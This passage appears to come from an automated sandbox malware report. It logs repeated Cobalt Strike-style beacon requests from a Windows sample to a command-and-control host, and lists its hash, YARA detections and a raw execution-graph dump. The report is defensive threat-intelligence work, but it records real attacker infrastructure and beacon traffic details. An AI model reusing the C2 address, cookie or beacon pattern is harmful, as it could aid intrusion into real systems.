                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 63 | Source IP: 192.168.2.4 | Source Port: 50056 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:31:02.750802040 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 64 | Source IP: 192.168.2.4 | Source Port: 50063 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:31:05.641815901 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 65 | Source IP: 192.168.2.4 | Source Port: 50067 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:31:08.545495987 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 66 | Source IP: 192.168.2.4 | Source Port: 50068 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:31:11.439768076 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 67 | Source IP: 192.168.2.4 | Source Port: 50069 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:31:14.336307049 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 68 | Source IP: 192.168.2.4 | Source Port: 50070 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:31:17.221771002 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 69 | Source IP: 192.168.2.4 | Source Port: 50071 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:31:20.126601934 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 70 | Source IP: 192.168.2.4 | Source Port: 50072 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:31:23.079849958 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 71 | Source IP: 192.168.2.4 | Source Port: 50073 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:31:26.002208948 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 72 | Source IP: 192.168.2.4 | Source Port: 50074 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:31:28.897826910 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 73 | Source IP: 192.168.2.4 | Source Port: 50075 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:31:31.800551891 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 74 | Source IP: 192.168.2.4 | Source Port: 50076 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:31:34.753815889 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 75 | Source IP: 192.168.2.4 | Source Port: 50077 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:31:37.813818932 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 76 | Source IP: 192.168.2.4 | Source Port: 50078 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:31:41.056504965 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 77 | Source IP: 192.168.2.4 | Source Port: 50079 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:31:43.970377922 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 78 | Source IP: 192.168.2.4 | Source Port: 50080 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:31:46.860937119 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 79 | Source IP: 192.168.2.4 | Source Port: 50081 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:31:49.751136065 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 80 | Source IP: 192.168.2.4 | Source Port: 50082 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:31:52.641571045 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 81 | Source IP: 192.168.2.4 | Source Port: 50083 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:31:55.534957886 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 82 | Source IP: 192.168.2.4 | Source Port: 50084 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:31:58.470114946 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 83 | Source IP: 192.168.2.4 | Source Port: 50085 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:32:01.470427990 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Target ID:0
                          Start time:13:27:56
                          Start date:26/12/2024
                          Path:C:\Users\user\Desktop\12.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\12.exe"
                          Imagebase:0x400000
                          File size:324'096 bytes
                          MD5 hash:C8C40C038A4A8541E0924520599D8C28
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.4124981749.0000000000DE8000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.4124981749.0000000000DE8000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                          • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                          • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                          • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                          • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                          • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                          • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                          • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                          • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                          • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                          • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:low
                          Has exited:false


                            Execution Graph

                            Execution Coverage:2.4%
                            Dynamic/Decrypted Code Coverage:89.5%
                            Signature Coverage:18.1%
                            Total number of Nodes:591
                            Total number of Limit Nodes:17
dbde47 85 API calls ___DllMainCRTStartup 40123->40313 40125 db16c4 40125->40020 40133 db386e ___DllMainCRTStartup GetLocalTime 40133->40141 40138 db15c2 ___DllMainCRTStartup 40138->40141 40142 db386e ___DllMainCRTStartup GetLocalTime 40138->40142 40145 db2874 ___DllMainCRTStartup 3 API calls 40138->40145 40146 db273c ___DllMainCRTStartup 4 API calls 40138->40146 40301 db8fa1 156 API calls ___DllMainCRTStartup 40138->40301 40302 db4f55 138 API calls 2 library calls 40138->40302 40303 db7853 124 API calls ___DllMainCRTStartup 40138->40303 40304 db7017 131 API calls 4 library calls 40138->40304 40305 db2fb7 123 API calls ___DllMainCRTStartup 40138->40305 40306 db2962 113 API calls 3 library calls 40138->40306 40307 dbde47 85 API calls ___DllMainCRTStartup 40138->40307 40308 dbde47 85 API calls ___DllMainCRTStartup 40138->40308 40141->40117 40141->40118 40141->40121 40141->40133 40141->40138 40266 db273c 40141->40266 40275 db2e3d 40141->40275 40282 db2874 40141->40282 40285 db54a0 40141->40285 40298 db6072 67 API calls 7 library calls 40141->40298 40299 dbbcc5 124 API calls 4 library calls 40141->40299 40300 dba36c htonl htonl _memset ___DllMainCRTStartup 40141->40300 40309 db300f 40141->40309 40142->40138 40145->40138 40146->40138 40148->40025 40149->40034 40150->40036 40151->40036 40152->40021 40154 dc87ff _malloc 67 API calls 40153->40154 40155 db81c7 40154->40155 40156 dc87ff _malloc 67 API calls 40155->40156 40159 db81e4 _memset ___DllMainCRTStartup 40155->40159 40157 db81d7 40156->40157 40158 dc8722 __setmbcp 67 API calls 40157->40158 40157->40159 40158->40159 40159->40080 40161 dc88b2 40160->40161 40167 dc8811 40160->40167 40321 dcb77f 6 API calls __decode_pointer 40161->40321 40163 dc88b8 40322 dca641 67 API calls __getptd_noexit 40163->40322 40166 dc88aa 40166->40082 40167->40166 40170 dc8822 40167->40170 40171 dc886e RtlAllocateHeap 40167->40171 40173 dc889e 40167->40173 40176 dc88a3 40167->40176 40317 dc87b0 67 API calls 4 library calls 40167->40317 40318 
dcb77f 6 API calls __decode_pointer 40167->40318 40170->40167 40314 dcb737 67 API calls 2 library calls 40170->40314 40315 dcb58c 67 API calls 7 library calls 40170->40315 40316 dc8cc2 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 40170->40316 40171->40167 40319 dca641 67 API calls __getptd_noexit 40173->40319 40320 dca641 67 API calls __getptd_noexit 40176->40320 40323 dc9e8e GetSystemTimeAsFileTime 40178->40323 40180 dbcb2d 40325 dc8c0a 40180->40325 40183 dc87ff _malloc 67 API calls 40184 dbcb76 _memset _realloc 40183->40184 40328 dca0d5 40184->40328 40186 dbcbe2 40188 dca0d5 _strtok 67 API calls 40186->40188 40187 dbcbb9 40187->40186 40189 dca0d5 _strtok 67 API calls 40187->40189 40190 db13f0 40188->40190 40189->40187 40191 db5c3e 40190->40191 40192 dc9e8e __time64 GetSystemTimeAsFileTime 40191->40192 40193 db5c50 40192->40193 40194 dc8c0a ___DllMainCRTStartup 67 API calls 40193->40194 40195 db5c57 ___DllMainCRTStartup 40194->40195 40366 db5cc4 40195->40366 40198 dbea37 40199 dbea50 40198->40199 40205 dbea63 _memset 40198->40205 40200 dbea59 40199->40200 40201 dbea65 40199->40201 40203 dc87ff _malloc 67 API calls 40200->40203 40377 dca196 72 API calls 8 library calls 40201->40377 40203->40205 40204 dbea72 40204->40205 40205->40088 40207 db387c ___DllMainCRTStartup 40206->40207 40208 db3882 GetLocalTime 40207->40208 40209 db3880 40207->40209 40210 db3894 ___DllMainCRTStartup 40208->40210 40209->40092 40210->40092 40212 db38d7 ___DllMainCRTStartup 40211->40212 40212->40212 40216 db144d 40212->40216 40378 dbc0d3 103 API calls ___DllMainCRTStartup 40212->40378 40214 db390f 40379 dbc0fd 103 API calls 4 library calls 40214->40379 40216->40101 40216->40102 40218 db393e ___DllMainCRTStartup 40217->40218 40219 db3980 htonl htonl 40218->40219 40220 db145b 40218->40220 40219->40220 40221 db39a0 40219->40221 40220->40106 40220->40108 40222 dc87ff _malloc 67 API calls 40221->40222 40223 db39a9 _realloc ___DllMainCRTStartup 40222->40223 40224 db39f3 _memset 
